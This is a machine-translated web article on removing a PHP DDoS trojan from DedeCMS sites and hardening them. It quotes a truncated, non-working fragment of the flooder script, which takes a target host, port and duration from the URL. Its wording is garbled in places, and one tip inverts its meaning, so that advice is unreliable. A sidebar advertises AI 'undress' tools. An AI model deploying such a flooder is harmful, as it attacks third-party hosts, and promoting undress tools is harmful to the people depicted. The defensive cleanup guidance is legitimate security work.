How dedecms solves DDOS horse-mounting vulnerability
How does dedecms solve the DDOS mounting vulnerability?
Dedecms is a well-known PHP open source system in China, and it is also the first choice CMS system for many webmasters to build websites. Its simplicity and ease of use is a major reason for its widespread practicality, and it is precisely because of the open source of dedecms that it has also led to Many hackers have focused on this program, so they have successively researched many dedecms vulnerabilities. As a result, quite a few dedecms websites have been suspended. Some have been warned by the computer room, and serious computer rooms have been forcibly shut down, resulting in huge losses. . Today we will do a more in-depth analysis of this problem and find a solution.
Recommended study: 梦Weavercms
Characteristics of the hooked horse:
Open your own website homepage and you will find it by viewing the source code Many black link codes have been added to your website. The black link code is the simplest and easiest for webmasters to see. It is nothing more than the code for friendly links.
Another characteristic is that when you open a website, you will be prompted by 360 Security that the website has the risk of malware. This type of malware code is usually a frame code or a js code or an image code. Another characteristic is that the website It will suddenly fail to open or open slowly. If you check the traffic, you will find that it takes up a lot of traffic. This means that the traffic is sent out, which is also called a UDP traffic packet attack. The above are the general characteristics of dedecms being hacked. Let’s talk about some practical solutions and preventive measures for website being hacked.
First download the code of the website program to your local computer, use the sinesafe Trojan removal tool to check it, and find that there are many script Trojans in the data/cache/ directory. When you open the Trojan script, you find some unknown PHP codes. , put the code into the sinesafe Trojan tool and conducted an in-depth analysis and found the characteristics of the Trojan. The code is as follows:
The code is as follows:
<?php set_time_limit(984918); $host = $_GET['host']; $port = $_GET['port']; $exec_time = $_GET['time']; $Sendlen = 65535; $packets = 0; } echo "================================================ "; echo " <font color=blue>www.phpddos.com "; echo " SYN Flood 模块 "; echo " 作者:ybhacker "; echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font> "; echo "================================================ "; echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span> </font>"; echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span> </font>"; echo " 攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span> </font>"; echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; ?>
I found on the Internet that this is a php script for UDP traffic attack Trojan horse, this Trojan horse can achieve the effect of DDoS traffic attack by running with the permission of website script. No server permissions are required. Only then did I understand why the computer room said that my website was always outsourcing. Websites running this script would open slowly, including my website. Now that you have found the problem, you need to solve it quickly. Click Clear Trojan Code to clear it all at once. There are no unfamiliar file names in the Data/cache/ directory. Finally, in order to cure this "stubborn disease", we summarized several solutions and preventive measures:
1. Security settings of the dedecms directory: data/cache/ templets uploads directory settings are readable and writable, but not executable. Include, member, and plus set readable, executable, and non-writable permissions. Since dedecms does not use stored procedures anywhere, you can disable FILE, EXECUTE, and other permissions to perform stored procedures or file operations.
2. Website program security: This is also the most fundamental precaution. If it is a virtual space, it is recommended to find a professional to do website security maintenance to ensure the safety of the website program. Only a safe website can bring safe and stable customers. source.
3. Program update: Open the dedecms background to see if there are any updated patches. If so, please update and patch them in time. If your version is very old, I recommend reinstalling the new version because The new versions are relatively safe and are different from the old versions in many places.
4. Backend management directory: dedecms The backend management directory generally defaults to dedecms. Many webmasters never care about this backend address. I am very responsible to tell you that if the managed directory address is the default, you will be hung up. The probability of horse is 0. It is recommended to change the name of the directory to a name that is a combination of numbers and letters.
5.FTP website management password: It is recommended to change FTP passwords and website management passwords frequently, because many hackers are using brute force to crack passwords, and make the passwords as complex as possible with special symbols and letters.
The above is the detailed content of How dedecms solves DDOS horse-mounting vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

Notepad++7.3.1
Easy-to-use and free code editor

SublimeText3 Chinese version
Chinese version, very easy to use

Zend Studio 13.0.1
Powerful PHP integrated development environment

Dreamweaver CS6
Visual web development tools

SublimeText3 Mac version
God-level code editing software (SublimeText3)

Hot Topics

Empire CMS template download location: Official template download: https://www.phome.net/template/ Third-party template website: https://www.dedecms.com/diy/https://www.0978.com.cn /https://www.jiaocheng.com/Installation method: Download template Unzip template Upload template Select template

Dedecms is an open source Chinese CMS system that provides content management, template system and security protection. The specific usage includes the following steps: 1. Install Dedecms. 2. Configure the database. 3. Log in to the management interface. 4. Create content. 5. Set up the template. 6. Manage users. 7. Maintain the system.

Accurate and reliable dedecms conversion tool evaluation report With the rapid development of the Internet era, website construction has become one of the necessary tools for many companies and individuals. In website construction, using a content management system (CMS) can manage website content and functions more conveniently and efficiently. Among them, dedecms, as a well-known CMS system, is widely used in various website construction projects. However, sometimes we are faced with the need to convert the dedecms website to other formats, in which case we need to use a conversion tool

Template replacement can be implemented in Dedecms through the following steps: modify the global.cfg file and set the required language pack. Modify the taglib.inc.php hook file and add support for language suffix template files. Create a new template file with a language suffix and modify the required content. Clear Dedecms cache.

How to upload local videos using Dedecms? Prepare the video file in a format that is supported by Dedecms. Log in to the Dedecms management backend and create a new video category. Upload video files on the video management page, fill in the relevant information and select the video category. To embed a video while editing an article, enter the file name of the uploaded video and adjust its dimensions.

Learning dedecms encoding conversion function is not complicated. Simple code examples can help you quickly master this skill. In dedecms, the encoding conversion function is usually used to deal with problems such as Chinese garbled characters and special characters to ensure the normal operation of the system and the accuracy of data. The following will introduce in detail how to use the encoding conversion function of dedecms, allowing you to easily cope with various encoding-related needs. 1.UTF-8 to GBK In dedecms, if you need to convert UTF-8 encoded string to G

Dedecms is an open source CMS that can be used to create various types of websites, including: news websites, blogs, e-commerce websites, forums and community websites, educational websites, portals, other types of websites (such as corporate websites, personal websites, photo album websites, video sharing website)

DedeCMS is an open source content management system that has some potential vulnerabilities and security risks: 1. SQL injection vulnerability. Attackers can perform unauthorized operations or obtain sensitive data by constructing malicious SQL query statements; 2. File Upload vulnerability, attackers can upload files containing malicious code to the server to execute arbitrary code or obtain server permissions; 3. Sensitive information leakage; 4. Unauthenticated vulnerability exploitation.
